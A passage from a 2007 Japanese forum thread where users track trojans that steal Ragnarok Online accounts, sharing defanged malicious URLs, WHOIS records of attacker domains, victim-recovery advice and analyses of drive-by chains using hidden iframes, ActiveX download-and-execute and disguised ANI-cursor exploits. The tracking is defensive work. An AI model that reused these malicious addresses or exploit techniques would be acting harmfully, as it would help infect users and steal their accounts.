F-Secua、キングソフト、NOD32辺りは知ってるが。取り敢えず、LiveROの方に書いとくといいかと。
こっちではまとめの人の検索性が悪くなるので移動した方がいいんでないかな。

590 ：(^ー^*)ノ〜さん sage ： 2007/04/14(土) 22:28 ID:Ls2oFjba0

>>588
hosts書き換えとかはやってあるのかな？

まずは検査、踏んでも回避できる策を講じてないのに、引っ掛からなければ、別のソフトで再度スキャン。
複数の検査でも、出てこないなら、すり抜けする新規の代物か確認してもらうため、LiveROのスレで相談。

「心配ならＯＳ入れなおせ」というのがこのスレでの結論。

591 ：(^ー^*)ノ〜さん sage ： 2007/04/14(土) 22:32 ID:6MjjVsoi0

mmdd.exeやっと落とせた。これ手間かかってんなー。
UPXで固めてあるので解凍。このexeはWinRAR自己解凍書庫なのでさらに解凍。
1.jpgと22.exeが出現。1.jpgは笑えるアニメgifで、22.exeがトロイ本体。
22.exeはUPXで固めてさらにいじってあるのでここで断念。提出予定。

592 ：(^ー^*)ノ〜さん sage ： 2007/04/14(土) 22:32 ID:l3LAkSbJ0

>>588
不安なようならOS再インストールして
これを期にIE→FireFoxとかセキュリティソフト入れるなりした方がいいんじゃないか。

593 ：(^ー^*)ノ〜さん sage ： 2007/04/14(土) 23:40 ID:1h7no7II0

>>589
キングソフトは未だにすげー抵抗がある・・・

594 ：(^ー^*)ノ〜さん sage ： 2007/04/15(日) 00:20 ID:Ny5SGlh30

コピった開発環境で金儲けしようとしてる様に見える。

595 ：(^ー^*)ノ〜さん ： 2007/04/15(日) 00:32 ID:6heUjr1B0

レスありがとうございます。
とりあえず凄い不安で不安でしょうがないのでＯＳを入れなおそうと思います。
が、実はＯＳ入れなおすの初めてでして,この場合,Ｃドライブだけでなく全部やりなおしたほうがいいのでしょうか・・・

ちなみにhostsの書き換えはやっていませんでした（´・ω・｀）

596 ：588 ： 2007/04/15(日) 00:34 ID:6heUjr1B0

>>595
は、私ですorz

597 ：(^ー^*)ノ〜さん sage ： 2007/04/15(日) 00:50 ID:AUjxxU8o0

>>595
踏んだ後に、ログイン・パスワード変更などを一切行なっていないなら、そのまま再インストール。

踏んだ後に、ログイン等を行なっていたら、急いで1CDLinux等を作成し、安全な環境からパスワード変更。
（↑これだけは至急で）　その後に、ＯＳ入れなおし。

普通の使い方であれば、起動ドライブのみ入れなおしでＯＫ。ブラウザのキャッシュ等を別ドライブに置いてるとか
ROがそっちのドライブに入っているとか、変わったことをやっていれば、そちらに残骸が残る可能性はあるので
ＯＳだけ入れなおせばいいと保証することはできない。

598 ：(^ー^*)ノ〜さん sage ： 2007/04/15(日) 03:17 ID:/9/GYwS60

>>580 のmmkk.com(中身exe)も落とせた。
500kB以上とサイズが全然違うけど、固め方は >>591 と同じ。
んで22.exeが微妙に違う。ドメインもIPも違うけど同じ犯人。
ちなみにKasperskyがmmddもmmkkも検知。
mmddを送ってからmmkkをダウンロードしている間に対応された…。
>>582 のserver.exeがアップされた模様。

599 ：(^ー^*)ノ〜さん sage ： 2007/04/15(日) 03:34 ID:/9/GYwS60

>>582 PESpin(ポーランド製?)ってので固めてあった。
初めて聞いたよ…。物としては普通の(?)Maran。

600 ：(^ー^*)ノ〜さん ： 2007/04/15(日) 09:44 ID:BXnkQovi0

不安なので投稿させてください。

【　　アドレス 　 】 ttp://www■hosetaibei■com/bbs/　
【気付いた日時】 4/15 9時頃
【　 　　 OS　 　 】 Windous XP Home Edition sp2
【使用ブラウザ 】 IE6.0
【WindowsUpdateの有無】 4/12前後の更新です
【　アンチウイルスソフト 】 avast
【その他のSecurty対策 】 ZONEALARM
【 ウイルススキャン結果】 現在進行形でやってます。
【スレログやテンプレを読んだか】 以前から拝見しています。
【説明】
ブログのコメント欄に記載されていたため、削除、拒否設定しようとしたら
間違えて踏んでしまいました。
飛んだ先の画面は青い背景のものです。
ソースチェッカーで確認したところフレームタグが２つ見つかり、
どちらとも危険なURLのひとつです、と表示されました。
アカハックされているかはログインしていないので分かりません。

601 ：(^ー^*)ノ〜さん sage ： 2007/04/15(日) 10:02 ID:AUjxxU8o0

>>600
>アカハックされているかはログインしていないので分かりません。
パスワードの送信をしない限りは検知読み出されない。ログインしてないなら一切しないこと。

一度もログイン。パス変更などしていないなら、検索して除去、もしくは、ＯＳ再インストール

ログインやパス変更をしてしまっていたら、それが読まれている可能性があるので
1CDlinuxなどの安全な環境で起動してパス変更。その後、除去もしくはＯＳ再インストール。

>不安なので投稿させてください。
不安なので〜というのは、こっちのスレじゃなく、LiveROの担当。
でも、踏んでしまった場合の対処方法はこっちのスレ。

602 ：(^ー^*)ノ〜さん sage ： 2007/04/15(日) 11:05 ID:/9/GYwS60

firfir1■blog90■fc2■com
いつものiframe呼び出し(lovetw)。

ブログとしての自由度が減るからタグの制限は難しいかもしれないけど
せめてアカウント取得に何らかの制限を付けられないもんかねぇ…。

603 ：(^ー^*)ノ〜さん ： 2007/04/15(日) 19:15 ID:6heUjr1B0

＞＞５９７
ありがとうございます。
ですが、1CDLinuxが上手く作れず上手く機動してくれません。
この際、きっぱり諦めてＯＳ入れなおしたほうがいいでしょうか・・・

604 ：(^ー^*)ノ〜さん sage ： 2007/04/15(日) 20:01 ID:AUjxxU8o0

>>603
緊急性は、パスワードを読み取られる可能性のある行為をしたのかどうかによる。自己責任でどうぞ。

605 ：(^ー^*)ノ〜さん sage ： 2007/04/15(日) 21:57 ID:iPn4BNYK0

毎度おなじみの福建人の新ドメイン

blog-ekndesign■com

Domain Name ..................... blog-ekndesign■com
Registrant Name ................. zhiqiang lin
Registrant Organization ......... zhiqiang lin
Registrant Address .............. fujian longyan
Registrant City ................. longyan
Registrant Province/State ....... fujian
Registrant Postal Code .......... 610000
Registrant Country Code ......... CN

606 ：(^ー^*)ノ〜さん sage ： 2007/04/15(日) 22:06 ID:iPn4BNYK0

どうも605のはまたも錯誤狙いのようだ。

ハイフンをドットに変えるとドットブログと言う国内のサービスページが存在する。
ttp://blog.ekndesign.com/

607 ：(^ー^*)ノ〜さん sage ： 2007/04/15(日) 22:23 ID:iPn4BNYK0

と思ったら13日は福建人のアカハクドメイン入れ食い状態。
16、7分の間に6つもドメインを取っている。
なんちゃってニフティ復活。
多いので分割するわ。

Domain Name ..................... gamesmusic-realcgi■net
Registrant Name ................. zhiqiang lin
Registrant Organization ......... zhiqiang lin
Registrant Address .............. fujian longyan
Registrant City ................. longyan
Registrant Province/State ....... fujian
Registrant Postal Code .......... 610000
Registrant Country Code ......... CN
Expiration Date ................. 2008-04-13 06:55:53


Domain Name ..................... homepage-nifty■com
Registrant Name ................. zhiqiang lin
Registrant Organization ......... zhiqiang lin
Registrant Address .............. fujian longyan
Registrant City ................. longyan
Registrant Province/State ....... fujian
Registrant Postal Code .......... 610000
Registrant Country Code ......... CN
Expiration Date ................. 2008-04-13 06:49:02


Domain Name ..................... jpxpie6-7net■com
Registrant Name ................. zhiqiang lin
Registrant Organization ......... zhiqiang lin
Registrant Address .............. fujian longyan
Registrant City ................. longyan
Registrant Province/State ....... fujian
Registrant Postal Code .......... 610000
Registrant Country Code ......... CN
Expiration Date ................. 2008-04-13 06:52:58

608 ：(^ー^*)ノ〜さん sage ： 2007/04/15(日) 22:24 ID:iPn4BNYK0

後編
Domain Name ..................... irisdti-jp■com
Registrant Name ................. zhiqiang lin
Registrant Organization ......... zhiqiang lin
Registrant Address .............. fujian longyan
Registrant City ................. longyan
Registrant Province/State ....... fujian
Registrant Postal Code .......... 610000
Registrant Country Code ......... CN
Expiration Date ................. 2008-04-13 06:42:51


Domain Name ..................... plusd-itmedia■com
Registrant Name ................. zhiqiang lin
Registrant Organization ......... zhiqiang lin
Registrant Address .............. fujian longyan
Registrant City ................. longyan
Registrant Province/State ....... fujian
Registrant Postal Code .......... 610000
Registrant Country Code ......... CN
Expiration Date ................. 2008-04-13 06:41:21


Domain Name ..................... runbal-fc2web■com
Registrant Name ................. zhiqiang lin
Registrant Organization ......... zhiqiang lin
Registrant Address .............. fujian longyan
Registrant City ................. longyan
Registrant Province/State ....... fujian
Registrant Postal Code .......... 610000
Registrant Country Code ......... CN
Expiration Date ................. 2008-04-13 06:57:06

609 ：にゅぼーん にゅぼーん ： にゅぼーん

にゅぼーん

610 ：(^ー^*)ノ〜さん sage ： 2007/04/15(日) 23:35 ID:XUJ0uFLQ0

乙。いまさらなie6xpに泣いた。ie7vistaとかで取れよ…。

611 ：(^ー^*)ノ〜さん sage ： 2007/04/15(日) 23:38 ID:P6EKnolt0

>>610
それは既にある

612 ：(^ー^*)ノ〜さん sage ： 2007/04/15(日) 23:39 ID:P6EKnolt0

追記

もちろん中華なので試さないように

613 ：(^ー^*)ノ〜さん sage ： 2007/04/15(日) 23:54 ID:XUJ0uFLQ0

あーあるね。でもこれカナダのドメイン業者じゃね?

614 ： ◆sp4Sh9QXGI sage ： 2007/04/16(月) 00:27 ID:HVBNsJ4v0

deco030-cscblog■comのみ222.77.185.84、
残りは222.77.185.110でした。
必死です。

615 ：(^ー^*)ノ〜さん sage ： 2007/04/16(月) 00:43 ID:BaSWdwq50

しかしすごい量だな…。

616 ：(^ー^*)ノ〜さん sage ： 2007/04/16(月) 01:37 ID:BaSWdwq50

PC用冷却パーツで有名なZalmanのサイトが改竄された模様。
www■zalman■co■kr
先頭に以下のiframeが仕込まれている(台湾の短期大学)。
www■yuhing■edu■tw/board/where/where.htm
中身はjpgに偽装したaniカーソルのスクリプト。
aniは以下の2匹だけど現在は消えている。
www■yuhing■edu■tw/board/where/z1.jpg
www■yuhing■edu■tw/board/where/z2.jpg
スクリプトはそのまま残っているので、
短大のサーバのウイルス対策ソフトにaniだけ消されたものと思われ。

617 ：(^ー^*)ノ〜さん sage ： 2007/04/16(月) 01:40 ID:qbjWBBUv0

おいおい・・・そろそろ限度ってモンを越えてないか？

618 ：(^ー^*)ノ〜さん sage ： 2007/04/16(月) 02:12 ID:BaSWdwq50

なに、とっくに超越している。
価格comにリネージュトロイが仕込まれたこともある。
0-dayならともかく簡単に食われるようなサーバも悪い。

619 ：(^ー^*)ノ〜さん sage ： 2007/04/16(月) 04:42 ID:08W2INan0

一応報告
>>506にも載っていますが書き込まれた場所が違うので。
某ＭＥ系サイトに投稿されていた垢ハック書き込み。
以前投稿された書き込みをそのままコピーし、Homeの部分だけアカハクアドレスに
すり替えてるというもの。

【アドレス】ttp://asdsdgh-jp■com/onlien

まとめサイトから行けるソースチェッカーで調べてみた所、危険アドレスとして
警告は出ないもののソースを見ると･･･
【注】ttp://www■conecojp■net/online/jpt1■exe
↑を実行するように･･･。（このアドレスは危険アドレスとして警告でます）
まとめサイトの危険サイト＆ドメインリストに載っているものの一つですね。
やっぱりソースチェッカーだけでは不十分なんだな〜っとつくづく感じた。

620 ：(^ー^*)ノ〜さん sage ： 2007/04/16(月) 09:41 ID:b3AMl+zg0

こんなドメインも登録された、なんちゃってガマニア。
ソース冒頭のスクリプトで罠置き場を呼び出す。

www■gamanian688■com
ws91■com/2■js　(難読化スクリプト　1-3まである)

登録情報、上のは福建。
下のは罠以外のページを確認出来ないので仲間と思われる。

Domain name: gamanian688■com
Registrant Contact:
linxiaoyun
xiaoyun lin
- fax: -
-
- Fujian -
cn
Created: 2007-04-13


Domain Name:ws91■com
Registrant:
ying hu
xiangtan hunan china
201176

Administrative Contact:
ying
ying hu
xiangtan hunan china
xiangtan Beijing 201176
CN
Expiration Date: 2007-12-04

621 ：(^ー^*)ノ〜さん sage ： 2007/04/16(月) 10:10 ID:b3AMl+zg0

www■gamanian688■com の罠スクリプト部分がもう外されている。
コール先のws91をhostsで対処後、OPERAで飛び込んだ直後に消したんで、
罠ドメインであることの発覚を恐れ慌てて消したと思う。
この間数分の出来事だったからね。

また違う罠を仕込もうとするかもしれないので要警戒。
下のws91は罠バリバリで置かれてる。

622 ：(^ー^*)ノ〜さん sage ： 2007/04/16(月) 10:16 ID:dPJsVngY0

無関係サイト改竄とか完全にRoをハック狙い撃ちされてるのに
こんな状態でも何の警告も対策も出せない癌／(＾o＾)＼
これは本当に末期かも知れんね
Roがなくなれば無関係サイトへの被害がなくなると考える常識人が出てもおかしくない

623 ：(^ー^*)ノ〜さん sage ： 2007/04/16(月) 12:13 ID:eVLj2nEI0

【　　アドレス 　 】 ttp://www■game-mmobbs■com/bbs/

散々既出のURLだけど、自分のwikiサイトが改変されてたのに気付いて編集した直後に、またやられた。
被害内容は、既存で貼られた個人リンクのURLだけを、これらハックURLに変更された。

偶然だと思うが、改変先を監視してるとかないよね。

少し遡ると、こういうURLもあった…どうも変更先の目標にもなってる気がするんだよね･･･。
【　　アドレス 　 】 ttp://■www■maplestorfy■com

624 ：(^ー^*)ノ〜さん sage ： 2007/04/16(月) 12:35 ID:VT4wvVpLO

ミクシーのＨＰそのものに罠を仕掛けるのは可能？
どうみても怪しい所が存在してるんだけど。
「ラグナロク」にヒットするレビュー物全てにコピペされたアドが貼りまくりだもんで。

625 ：(^ー^*)ノ〜さん sage ： 2007/04/16(月) 13:20 ID:eVLj2nEI0

良い情報になるかわからないけど、福建省の奴等って

ttp://search.yahoo.co.jp/search?p=RagnarokOnline+wiki+2007%2F03%2F29&ei=UTF-8&meta=vc%3D&fl=0&pstart=1&fr=top_v2&b=31

こんな感じでYahooで検索してるっぽいね。

626 ：(^ー^*)ノ〜さん sage ： 2007/04/16(月) 14:07 ID:eVLj2nEI0

もう１つおまけに
94.116.162.220.board.ly.fj.dynamic.163data.com.cn
こんなところからアクセスしてます。

board.ly.fj.dynamic.163data.com.cn で検索すると結構アクセス拒否にしてるようなところでてるんですね。

627 ：(^ー^*)ノ〜さん sage ： 2007/04/16(月) 14:42 ID:b3AMl+zg0

罠ブログ
ttp://blog200■blog100■fc2■com/

そこで見つけたもの。
取りたてホヤホヤを書き込んだようですね。
www■extd-web■com/blog/
から以下がコールされる
www■blog-ekndesign■com/blog/see■exe

これはClamWinでも検知。
see■exe: Trojan.Spy-3651 FOUND

カスペでも検知。
see■exe - infected by Trojan-PSW.Win32.Maran.cj


登録情報、毎度おなじみの
Domain Name ..................... extd-web■com
Registrant Name ................. zhiqiang lin
Registrant Organization ......... zhiqiang lin
Registrant Address .............. fujian longyan
Registrant City ................. longyan
Registrant Province/State ....... fujian
Registrant Postal Code .......... 610000
Registrant Country Code ......... CN
Expiration Date ................. 2008-04-12 12:18:57

628 ：(^ー^*)ノ〜さん sage ： 2007/04/16(月) 15:04 ID:KBmAc7cA0

AssassinTemplateでまたも周知の垢ハックURLががが。
対策を取らない正当な理由ってあるのでしょうか。

Top / スキル / 生産 / 料理
.[http://www■din-or■com/bbs 料理]

.[http://www■din-or■com/bbs 生産設備]

.[http://www■din-or■com/bbs 料理テクニック]

.[http://www■din-or■com/bbs 生産道具]

[http://www■din-or■com/bbs 料理レシピ]

.[http://www■din-or■com/bbs 中間素材]

.[http://www■din-or■com/bbs 肉料理]

.[http://www■din-or■com/bbs 魚介料理]

629 ：(^ー^*)ノ〜さん sage ： 2007/04/16(月) 15:36 ID:KBi1wxlA0

RO関連のwikiより、まったく無関係なwikiで改変される方がこわいわ
レポートの題材探すだけで感染する時代って凄いな

630 ：(^ー^*)ノ〜さん sage ： 2007/04/16(月) 15:42 ID:sOCsgXSf0

踏んだ瞬間avastさんが反応したけど、大丈夫だろうか･･･

【　　アドレス 　 】 ttp://www■ragnarok-game■com/bbs/
【気付いた日時】 たった今。
【　 　　 OS　 　 】 Windows2000 Professional (5.0 ビルド 2195)
【使用ブラウザ 】 IE6.0
【WindowsUpdateの有無】 4/10前後
【　アンチウイルスソフト 】 avast カスペルスキー
【その他のSecurty対策 】 AdAware
【 ウイルススキャン結果】 avast カスペルスキーにて 進行中
【スレログやテンプレを読んだか】 今から読みます。
【説明】
某DSソフト(テイルズシリーズ)の攻略Wikiのリンクの一部が改変されており
踏んでしまいました。ROとは無関係だったため油断しておりました。
WikiにはTOPにコメントをして注意喚起のみ行ってあります。

現在感染した可能性のあるPCを隔離してノートPCにて対策を講じております。
踏んだ瞬間にavastが反応したため隔離・削除だけはしてありますが危険でしょうか？

とりあえず過去ログの確認と対策をしてまいります；；

631 ：(^ー^*)ノ〜さん sage ： 2007/04/16(月) 15:59 ID:+Mv9W6LP0

>628
>対策を取らない正当な理由ってあるのでしょうか。

罠アドレスは書き込み出来ない方がいいのは確かだが、その言い方はどうかと思うな。
Spam.phpやそれに相当する機能を実装して安全性を高めて欲しい、という要望を出せば
いいだけだと思うんだが。

アサテンプレって外部ページのクッションがあるし、全く対策がされてないわけじゃないし。


ところで「対策」という文字で思い出したが、編集用Wikiと閲覧用Wikiを分けてる所が
あるが、あれって垢ハク対策として有効なんだろうか？
操作ミスや出来心系の悪戯による改変を防ぐ、という意味はあるが、中華相手には
全く無意味な気がするんだけど。

632 ：(^ー^*)ノ〜さん sage ： 2007/04/16(月) 16:04 ID:IktSJGTD0

● 怪しいアドレス？を踏んだ時用

【　　アドレス 　 】 www■soultakerbbs■net/388465/
【気付いた日時】 4/16　15：00
【　 　　 OS　 　 】 WindowsXP
【使用ブラウザ 】 IE6
【WindowsUpdateの有無】 自動アップデイトにしてます、一番最後はいつ頃かわかりません
【　アンチウイルスソフト 】 NortonInternetSecurity2006
【その他のSecurty対策 】 無
【 ウイルススキャン結果】 NortonInternetSecurityでは検出無
【スレログやテンプレを読んだか】 (今読んでます)
【説明】
(『怪しいアドレス』との判断した理由、症状を詳しく書く)
友人の名前でGのWIKIに投稿があり、何も考えずクリックしてしまいました。後にアドレスを
調べてみると、様々なサイトに同アドレスが貼り付けられていることからアカハックアドレス
ではないかと思いました。クリックしたときは、何も表示されなかったです。
無知だったため、そのアドレスを踏んだ直後に
『GungHo-IDパスワード』『アトラクションIDパスワード』をそのままPCを変えることなく
行ってしまいました。ROの課金は踏んだときも現在も切れている状態です。
このサイトがアカハックに関連のあるものだとした場合、今から私はどのような対策を
行えばよいでしょうか？どうぞよろしくお願いします

633 ：(^ー^*)ノ〜さん sage ： 2007/04/16(月) 16:14 ID:mokvk4Oc0

>>631
閲覧用は、管理人しか変更できなくて、
編集用の変更点を管理人が確認して、閲覧用に反映とか？

634 ：(^ー^*)ノ〜さん sage ： 2007/04/16(月) 16:37 ID:H+wYXYov0

>>632
>【　　アドレス 　 】 www■soultakerbbs■net/388465/
今は気配無いけどどうもそれくさい感じ。ドメイン保持者も中華。
Created: 05-mar-2007
Registrant Name ................. lin zhiqiang
Registrant Organization ......... zhiqiang lin
Registrant Address .............. fujian longyan
Registrant City ................. longyan
Registrant Province/State ....... fujian
Registrant Postal Code .......... 364000
Registrant Country Code ......... CN

>【WindowsUpdateの有無】 自動アップデイトにしてます、一番最後はいつ頃かわかりません
今手動でUpdateを掛けてみて更新項目が無かったらパッチは当たっている物と推測。
比較的安心できる(完全ではないが)。

>ROの課金は踏んだときも現在も切れている状態です。
金払って中華が入ってアイテムをむしって行くとは思わないのでたぶん大丈夫かも。
恐らく垢が課金中の鴨がわんさか捕獲されているだろうから。勿論1dayで入ってきて
さらっていく可能性とかはある。

Norton以外のアンチウイルスソフトでチェックできればいいのだが、オンラインスキャンも
すすめ難いのでOSの入れなおしがベストだと言っておきます。その後Pass等の変更。

>>631
どっちかというと中の人が居ないWikispamer対策かと。Wikispamも中越地震のWikiで
見られた通り、Wiki活動を洒落にならないくらい阻害しますから。

635 ：(^ー^*)ノ〜さん sage ： 2007/04/16(月) 16:37 ID:LPv/V11G0

編集用を登録制にする
編集用へはWiki内外どちらからもリンクを貼らない、検索ロボット対策をする、アドレスは画像で示す
反映の際に管理人がチェックする

分けることで追加できるオプションはこれぐらい。
基本的に検索してきてるはずなので、閲覧用しか検索できなければ多少は影響を抑えられる

636 ：(^ー^*)ノ〜さん sage ： 2007/04/16(月) 16:49 ID:umE2d6Qe0

>>632
安全な環境（テンプレ参照）を作成し、パス変更。

しあｋる後に垢ハックトロイの削除、もしくは、ＯＳ再インストール。

637 ：(^ー^*)ノ〜さん sage ： 2007/04/16(月) 16:56 ID:H+wYXYov0

>>634追記
GoogleCacheで見たらもろアカハクSiteでした。

638 ：(^ー^*)ノ〜さん sage ： 2007/04/16(月) 16:59 ID:+Mv9W6LP0

>632
以前、チケ切れにもかかわらず1Dayか何かを使われてハクられたという報告があった。
その後の報告が無かったためにネタかマジか判らないが、もし罠を踏んだ状態だとしたら
1Day使って入ってくる(＝既にハクの被害に遭ってる)可能性は否定できない。

取りあえず安全な環境からPASS変更をした後、PCのウィルスチェック。
その後安全になったと自信が持てた段階で、ROにログインして被害の有無の確認。


>編集用・閲覧用Wikiの話
SageWikiとかがそれに当たるんだけど、編集用Wikiにはリンクどころかアドレス自体
記載されてないし、編集に関して特に制限は無いみたい。

管理人さんが確認して更新してるならそれでも問題ないだろうけど、もしリアルタイムで
更新されてたら、中華が手動でハクアドレスを貼り付けに来た場合、意味があるのかな？と
ちょっと疑問だった。

自動投稿の対策として行ってるってなら、納得。

639 ：(^ー^*)ノ〜さん sage ： 2007/04/16(月) 19:53 ID:mao7+Ovc0

ついさっきログアウトした所
ＲＯクライアントの隣にhunting〜〜〜〜というメモ帳らしきものがでていて
同時に消えるのを確認しました。
自分なりに検索などで調べてみたのですがめぼしい答えがみつかりませんでした。

中途半端な質問で申し訳ないのですがhunting〜〜というのはアサウントハックに
関係してる可能性は強いでしょうか？

640 ：(^ー^*)ノ〜さん sage ： 2007/04/16(月) 19:57 ID:C7QTAEyQ0

>>639
自分はそういう話は聞いたことないが、かなり臭いと思う。

641 ：(^ー^*)ノ〜さん sage ： 2007/04/16(月) 20:07 ID:mao7+Ovc0

>>640
でもおかしなアドレス踏んだ覚えないんですよねぇ（汗

642 ：(^ー^*)ノ〜さん sage ： 2007/04/16(月) 20:10 ID:wPg/BxSW0

じゃー気にしないでROやればいいと思うよ

643 ：(^ー^*)ノ〜さん sage ： 2007/04/16(月) 20:17 ID:umE2d6Qe0

アサ ウントじゃなくて、ハンターだと思うんだ…そろそろLiveROへ行こうか。

既知のものかどうかは知らないし、垢ハックではないかもしれないが、なんらかの良くないものだと思われる。
とにかくスキャンしとけ。

644 ：(^ー^*)ノ〜さん sage ： 2007/04/16(月) 20:25 ID:fWFP1WbS0

何もする気が無いなら聞くなよ

645 ：(^ー^*)ノ〜さん sage ： 2007/04/16(月) 21:47 ID:9te1UaDe0

>>639
スパイウェアやウィルスの全スキャンかけて何もなきゃとりあえずほっときゃいんじゃない。

646 ：(^ー^*)ノ〜さん sage ： 2007/04/16(月) 22:23 ID:3ZXiyyQX0

心配ならＯＳ再インスコした方がよくない？
ウィルスかも知れないし
あるいは、ＯＳがバグって不安定のためにおこった現象かもしれないな

647 ：(^ー^*)ノ〜さん sage ： 2007/04/17(火) 05:03 ID:HodMr0Nw0

ここで検索かけても見つからないのでご報告
2007/4/17(Tue)02:39　に　　ODN　のIPからBBSに書き込みがありました
内容は/whereからのコピペと思われるもの画像も拾いものかと思われます
httpをNGワードにしているので頭欠けの状態で書き込まれていました
cgiに見せかけてますが、実際にcgiの場合は　〜.cgi　になるはず
ネット知識に自信がないので疑問符が多いですが
多重に仕掛けられた罠だと思います。
どなたか詳しい方確認をお願いしたいです。

www■jpxpie6-7net■com/web/read_cgi/

agues結果：China Beijing
　　　　　　　　画面は真っ白

ｿｰｽﾁｪｯｶｰ結果：
　cgi/index.htm　に２つの0サイズframe
　　┃
　　┣　ｗｚ.htm　なにもなし？
　　┗　wu.htm　更に２つの0サイズiframeタグ
　　　　　　┃
　　　　　　┣1.htm　ｽｸﾘﾌﾟﾄで↓URLを開くようにしているんだと思う
　　　　　　┃　　　　http://www■jpxpie6-7net■com/web/read_cgi/svchost■exe
　　　　　　┃　　　　
　　　　　　┗2.htm　DIVで　CURSOL　の指定が２つほど

648 ：(^ー^*)ノ〜さん sage ： 2007/04/17(火) 05:38 ID:FBP/AqYB0

>>607参照
早速新ドメイン使い始めたようだな

649 ：(^ー^*)ノ〜さん sage ： 2007/04/17(火) 05:51 ID:HodMr0Nw0

＞648さん
おお！検索のかけ方が悪かったのかな
ありがとうございます。
ソースチェックでは赤文字でてなかったんで一瞬　あれ？　と思ったんですが
やっぱ真っ黒ですよね。
書き込みがODNからなのが気になりますがIPだけでODNに報告とかって
意味ありますか？

650 ：(^ー^*)ノ〜さん sage ： 2007/04/17(火) 06:02 ID:FBP/AqYB0

トロイを仕込んだサイトへの誘導を書き込まれた
で、IPとかをきちんと揃えてODNへ通報でいいと思う
たぶんODNのサイトに窓口があるはずだから探してみてくれ

あと「BBSに画像をアップされた」でいいんだよな？
画像を迂闊に開かない方がいいかも知れん、偽装ファイルの可能性が高い
偽装ファイルかどうか確認する方法はあるが、不慣れならログだけとって削除がいいな

651 ：(^ー^*)ノ〜さん sage ： 2007/04/17(火) 07:04 ID:GKEN1oAm0

ODNはネカフェが結構多いので、返答に”不特定多数が利用する場所云々”が含まれていたら
そのホストを禁止にした方が早い。

ODN苦情先
abuse@odn.ad.jp

652 ：(^ー^*)ノ〜さん sage ： 2007/04/17(火) 08:03 ID:HodMr0Nw0

ありがとうございます
先ほどODNへ苦情を送ってきました
後は返事街というところです。

653 ：(^ー^*)ノ〜さん sage ： 2007/04/17(火) 08:22 ID:8PvAQQnM0

>>647
と同じ書き込みをうちのサイトでも確認、反射的に削除してしまったけど
うちも書き込み元がodnだった。jpドメインからの投稿をメインにすると面倒だなぁ…。

あとRO関連のサイトを5個程度持ってるんで、ある程度中華の流行みたいなのが
自サイトだけで追えるんだけど、ここ一週間程度音沙汰がない。
間隔あけて新方式を導入とかなのかもしれん。

====

書き込みホスト：ofsfb-21p4-127.ppp11.odn.ad.jp

３年ほどROをプレイしているが、今までちょくちょくBSで過剰精錬に挑戦して
たんだけど、どうも精錬する品によって精錬成功確立が違うような気がしてな
らない。俺の場合だとロンコの成功率が異常に高く、+７を連続４回成功させた
ことがある。しかし他のはいまいちで、シルクは10回くらい精錬して一度も+７
までにならなかった。まぁちょくちょく精錬する程度なので試行数が少ないか
らたまたまといったらそれまでなんだけど、BSになって武器研究10とった段階
でLvあげ止めてるので、BSのLvとかDexによって相性のいい精錬品があるんじゃ
ないかとか想像したりしてるんだが、他の人はどうなんだろと気になった。
詳しくはアルケミのテンプレを見ましょう。
http://www■jpxpie6-7net■com/web/read_cgi/
もし同じような傾向があれば教えて欲しいな。

654 ：632 sage ： 2007/04/17(火) 08:24 ID:xH+3v6ax0

みなさん、親切に教えていただいてありがとうございました
アドレスを踏んだ直後に『GungHo-IDパスワード』『アトラクションIDパスワード』
を変更してしまいましたが、それ以降は再度のパスチェンジを含め、教えて
いただいた対策のうちOSの再インストール以外は行いました
これで被害に合わないと信じたいです。。。
万が一被害に合ってしまったときは、被害者を増やさないことに役立つかは
わかりませんが、できるだけ詳しく報告にきます

本当にありがとうございました

655 ：(^ー^*)ノ〜さん sage ： 2007/04/17(火) 08:40 ID:GKEN1oAm0

>>653
そのホストをぐぐると
4月14日にも同じホストであちこちアカハク書き込みがあったみたいだから
常時接続環境もしくはネカフェPCでまず間違いなさそうだ。

656 ：(^ー^*)ノ〜さん sage ： 2007/04/17(火) 08:59 ID:NjDMcpQI0

>>647
もう少し詳しく調べてみたけど、
【1.htm】VBScriptとActiveXコントロールにより、下記のEXEファイルをダウンロードし実行するというもの。
　http://www■jpxpie6-7net■com/web/read_cgi/svchost■exe
【2.htm】ANIカーソルの脆弱性(MS07-017)を利用するもの。まずANIファイルがダウンロードされる。
　http://www■jpxpie6-7net■com/web/read_cgi/z1■jpg
　http://www■jpxpie6-7net■com/web/read_cgi/z2■jpg
上記２つは拡張子はJPGですが、実体はANIファイルです。
そして、ANIファイルが開かれると、下記のEXEファイルがダウンロード、実行される。
　http://www■jpxpie6-7net■com/web/read_cgi/svchost■exe (←z1.jpg)
　http://www■jpxpie6-7net■com/web/read_cgi/svchost■exe (←z2.jpg)

ウイルス対策ソフトでは、z1.jpg, z2.jpg, svchost.exeはいずれも検出対象になります(検出できない場合もあります)。
VIRUSTOTALでの結果です。このリンクの賞味期限は数時間です。
ttp://www.virustotal.com/vt/en/resultadof?91b26e569e89f3f1672ac5c3132219d0 (svchost.exe)
ttp://www.virustotal.com/vt/en/resultadof?9114429a04cdc163ddff24b78576a36a (z1.jpg)
ttp://www.virustotal.com/vt/en/resultadof?59d1ff86e36f7aeebb805da85e92108d (z2.jpg)

上記svchost.exeはMaran系トロイのようです。(Windowsには同名の正常なファイルがいるので注意)

657 ：(^ー^*)ノ〜さん sage ： 2007/04/17(火) 09:34 ID:T79riTlD0

>>616 のZalman、下にも一匹いた。
www■bdjyw■net/vip.htm
結論としてはASUSTeKに仕掛けられたのと同様のaniなんだけど、
Firefoxでソースを見るとちょっと面白い(IEでは見ないほうがいい)。

　以下興味ない人はスルーで。

文字コードがUS-ASCIIで化けてる。
US-ASCIIは7bit(0〜127)なんだけど、128を足して8bit(128〜255)にして
ソースの可読性を落とすと同時にフィルタリングの類のすり抜けを狙っている。
McAfeeは対応しているよと今月ブログに書いていたんだけど
( www.avertlabs.com/research/blog/?p=250 )、
去年中国のCoolDiyerというハッカーによってソース付きで公表されている
(Cを読める人は www●xdiyer●cn/?id=174 )。

IEは(少なくとも去年のIE7Beta2の段階では)最上位bitを落として
7bitとみなしてレンダリングした(Firefoxはシカトする)んだけど、
これはHTMLの規格としては(W3C的には)どうなってるんだろ?

このソースをいじれば逆変換も可能なので
検体提出マニアはどうぞ(無料のLSI-C86でコンパイル可)。

658 ：(^ー^*)ノ〜さん sage ： 2007/04/17(火) 10:50 ID:GKEN1oAm0

>>657
そのドメイン自体が罠っぽい。
TOPページのにも罠入り画像が仕込まれ呼び出される。

www■bdjyw■net/images/logo■jpg

上のは単なる中継ファイルなのであらゆるもので検知しない。
10時20分頃のVIRUSTOTALで完全スルー。

